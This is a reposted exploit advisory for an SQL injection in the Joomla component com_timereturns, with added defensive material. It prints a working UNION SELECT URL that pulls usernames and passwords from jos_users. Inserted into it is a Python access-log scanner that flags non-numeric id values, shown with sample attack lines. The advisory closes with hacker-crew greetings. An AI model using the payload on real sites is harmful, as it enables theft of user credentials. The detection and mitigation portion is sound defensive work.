Joomla Component Time Returns (com_timereturns) SQL Injection Vulnerability
Author: kaMtiEz www.2cto.com
######################################################################
[Software Information]
Developer: http://www.takeaweb.it/
: http://www.takeaweb.it/index.php?option=com_dms&view=category&layout=table&Itemid=13
Affected Versions: 2.0 (lower versions may also be affected)
#############################################################################################################
[Defect file]
http://www.bkjia.com/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=[num]
[XpL]
http://www.bkjia.com/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
[FIX]
Dunno: ">
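
Added example, not part of the original advisory and not the component's own code: since the id parameter is expected to be numeric ([num] above), a defender can scan web server access logs for com_timereturns requests whose id is anything other than a plain integer. The log lines, IP addresses and the function name are constructed for illustration, and a combined-format access log is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_ID = re.compile(r"[0-9]+")

# Constructed sample log lines (documentation IP range, shortened payloads).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_timereturns'
    '&view=timereturns&id=7 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?option=com_timereturns'
    '&view=timereturns&id=7+union+all+select+1,2,3 HTTP/1.1" 200 6210',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?option=com_timereturns'
    '&view=timereturns&id=7%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_content'
    '&id=a-b HTTP/1.1" 200 900',
]


def suspicious_timereturns_requests(log_lines):
    """Return (line_number, decoded_id) for every com_timereturns request
    whose id parameter is not a plain non-negative integer."""
    hits = []
    for lineno, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        # parse_qs percent-decodes values and turns '+' into a space,
        # so encoded and unencoded payloads are compared in one form.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        components = [value.lower() for value in params.get("option", [])]
        if "com_timereturns" not in components:
            continue  # other components are out of scope for this check
        for value in params.get("id", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((lineno, value))
    return hits


if __name__ == "__main__":
    for lineno, value in suspicious_timereturns_requests(SAMPLE_LOG):
        print(f"line {lineno}: non-numeric id {value!r}")
```

The same allow-list idea is the server-side mitigation: treat id as an integer before it reaches the query. If the site legitimately uses non-numeric id values, widen the pattern accordingly.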
#############################################################################################################
[Thx TO]
[+] INDONESIANCODER - EXPLOIT-ID - magelangcyber team - malangcyber crew - KILL-9
[+] Tukulesto, arianom, el-farhatz, Jundab, Ibl13Z, Ulow, s1do3L, Boebefa, Hmei7, RyanAby, Albert twired, GonzHack, n4kuLa
[+] Lagripe-Dz, KedAns-Dz, By_aGreSiF, t0r3x, Mboys, Contrex, Gh4mb4S, jos_ali_joe, keys, n4sss, r3m1ck, k4mpr3t0
[+] Yur4kh4, xr0b0t, kido, trycyber, n4ck0, Caddy-Dz, pinpinbo and all the friends I can't mention one by one :D
[NOTE]
[+] The Halal Bihalal was a success, mas dab :))
[+] If you make a decision, you must not regret it :-)
[+] Hellcome in MGL jos_ali_joe =))
[QUOTE]
[+] INDONESIANCODER still r0x
[+] Nothing secure ..